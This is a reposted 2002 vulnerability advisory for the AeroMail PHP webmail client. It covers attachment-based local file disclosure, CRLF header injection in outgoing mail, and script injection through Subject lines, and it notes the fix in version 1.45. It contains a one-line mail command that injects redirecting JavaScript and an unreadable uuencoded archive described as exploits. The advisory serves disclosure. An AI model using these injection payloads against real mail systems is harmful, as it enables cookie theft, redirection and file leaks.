Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » AeroMail multiple vulnerabilities

AeroMail multiple vulnerabilities

by Nikola Strahija on March 3rd, 2002 AeroMail is a Web-based email client written in PHP. It uses an IMAP server to read and store messages in one or more user-defined folders, and its features include HTTP authentication for login (no cookies), folder manipulation, support for sending and viewing attachments, inline image display, multilanguage support, and URL highlighting.


PROGRAM: AeroMail
VENDOR: Mark Cushman ([email protected])
HOMEPAGE: http://the.cushman.net/projects/aeromail/
MIRROR: http://www.packetplay.com/projects/aeromail/
VULNERABLE VERSIONS: all versions below 1.45
SEVERITY: medium to highISSUES:

1) When sending e-mails, you can trick the attachment subsystem into sending
local files from the web server or remote files from URL's instead of uploaded
files as it should.

How is that possible? Well, after PHP has uploaded a file, it sets a few
variables with information about it. One of them is the filename under which
the uploaded file has been temporarily stored. It is important to check that
this variable was set by uploading a file. It might also be normal POSTed
data, in which case you end up with this problem.

2) You can add additional headers to outgoing e-mail messages by sending some
normal data for the To or Cc or Subject fields, a CRLF and then another header
with some data. (A lot of other programs allow this too. It's not just
AeroMail.) This can be used for adding uuencoded attachments up in the headers
with lines ending in CR instead of CRLF, as previously discussed here on
Bugtraq.

3) JavaScript and HTML code is active, when Subject headers are displayed.
This allows DOS attacks by redirecting, theft of cookies etc.

Issues 1 and 2 require a valid user/password combination to be exploited,
while issue 3 is open to anyone.

The vendor was contacted with an explanation, two exploits and a patch on the
23rd of February. Version 1.45, which is not vulnerable to any of these
issues, was released on the 27th of February.


RECOMMENDATION:

I recommend that all users upgrade to version 1.45 immediately.


EXPLOITS:

Here are HTML exploits for issues 1 and 2. They are distributed as a
uuencoded, gzipped tar archive.

Issue 3 doesn't need a special exploit - you just send an ordinary mail:

mail -s 'self.location.href="http://www.kuro5hin.org/"'
[email protected] #?[H'_LJ_0LWK^K[G=YM>
MLU7#K^MW:]!Y>5,VD2M-)4`MCZ?/G]NQ_YV";MS_^DJS$>DD_BF+8:9=8*;!J,PT:/9)N>/T$Z8I&.%U]D?.
M[P?N4*2:I;H^?LB8"T%)#5S-/NM"WZ1%[email protected]=>7>M,H)J5*IS1
MX0-,9H&(A1RX/TP+N&`$(%[email protected]]?(NDJ[=ROTL:CYE8_CU%B8.(W6`[UI!&(Y/'Q$`HM
M?'>-?F:,Y&F6:]`85[2*AR%[email protected]=(W=,X1_+LOCJHPN*_XF$40U3'G,0$BXO3D'
[email protected]?[AFAV&K7)=-%8E5R8AU8G&T
M$K*B%E4E7#^&9?'[email protected]&Z-1T.M-/8HJ-K^PGIL70
M]`'[email protected]/[email protected]>=C_;2PL][LP2F3#%!2T:V?=EH]0`V2
[email protected]&JW%(;Y?]Q2%DSQPFVS!A"]S;.0:M;(X9:4MA>,H7"E,TA$7)IW^]
M;HS45U,-5544Y&RY:#NY*RFD(K=^S+>+^,M1P,=HX#R_FQ.A.LW


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »